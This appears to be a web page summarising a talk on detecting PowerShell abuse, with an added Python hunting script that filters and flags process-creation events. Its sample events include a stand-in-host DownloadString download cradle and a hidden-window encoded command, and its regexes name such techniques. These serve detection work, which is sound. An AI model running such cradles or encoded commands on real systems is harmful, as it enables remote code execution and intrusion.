Security through data


Hunting For PowerShell Abuse

BY Teymur Kheirkhabarov

in Documents, Papers

PowerShell is the favorite tool of the IT staff responsible for administering Windows infrastructures. It lets them manage the various services of the operating system and automate almost anything. But alongside administrators, PowerShell is also popular with attackers and malware authors. The reason PowerShell is so attractive to adversaries is quite obvious: it has been included by default in essentially every Windows operating system for a decade, provides access to the Windows API, and is rarely constrained, so adversaries can perform a wide range of tasks without much risk of being blocked. Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources over various network protocols, pass encoded payloads on the command line, or load PowerShell into other processes.

Because PowerShell is so prevalent among adversaries, it is very important for threat hunters to be able to detect malicious use of PowerShell and defend against it. In this presentation the author demonstrates approaches for detecting PowerShell abuse based on different event sources: native Windows logging capabilities as well as additional tools such as Sysmon or EDR solutions. How to collect traces of PowerShell use, how to filter out false positives, and how to find evidence of malicious use in the volume of events that remains after filtering: all these questions are answered in the talk for present and future threat hunters.
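As an added illustration (not code from the talk or its author), the following Python hunt runs over constructed process-creation events in the shape that Sysmon or native Windows logging produces: it first drops known administrative scripts to cut false positives, then flags the command-line patterns the abstract lists (encoded payloads, retrieval of remote resources, hidden windows) and decodes the encoded payload for the analyst. The event fields, the allowlist path and the sample lines are assumptions.

```python
import base64
import re

# Constructed sample events in a simplified process-creation shape (the fields of a Sysmon
# Event ID 1 / Windows 4688 record a PowerShell hunt needs). The suspicious lines are benign.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\Backup-Logs.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "CommandLine": "powershell.exe -nop -w hidden -enc "
     + base64.b64encode("Write-Output 'lab test'".encode("utf-16-le")).decode()},
    {"ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "powershell.exe -Command "
     "\"(New-Object Net.WebClient).DownloadString('http://placeholder.invalid/stage')\""},
]
# Hypothetical allowlist of scripts administrators run from scheduled tasks; events that
# execute one of them are dropped as known-good (the false-positive filtering step).
KNOWN_ADMIN_SCRIPTS = {r"c:\scripts\backup-logs.ps1"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the usual forms.
ENCODED_RE = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)
REMOTE_RE = re.compile(r"downloadstring|downloadfile|invoke-webrequest|net\.webclient", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SCRIPT_RE = re.compile(r"-file\s+\"?([^\s\"]+\.ps1)", re.I)

def decode_encoded_command(blob):
    """-EncodedCommand carries base64 of UTF-16LE text; return '' if it does not decode."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def hunt(events):
    """Return events that survive allowlisting and trip an indicator, with the reasons."""
    findings = []
    for ev in events:
        cmd = ev["CommandLine"]
        script = SCRIPT_RE.search(cmd)
        if script and script.group(1).lower() in KNOWN_ADMIN_SCRIPTS:
            continue  # known administrative automation: filtered out
        reasons = []
        enc = ENCODED_RE.search(cmd)
        if enc:  # show the decoded payload so the analyst need not decode it by hand
            reasons.append("encoded command: " + (decode_encoded_command(enc.group(1)) or "<undecodable>"))
        if REMOTE_RE.search(cmd):
            reasons.append("remote resource retrieval")
        if HIDDEN_RE.search(cmd):
            reasons.append("hidden window")
        if reasons:
            findings.append({"ParentImage": ev["ParentImage"], "CommandLine": cmd, "reasons": reasons})
    return findings
```

Running `hunt(SAMPLE_EVENTS)` drops the allowlisted backup script and returns the two remaining events with their reasons.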

© 2021 | CyberMaterial | All rights reserved.
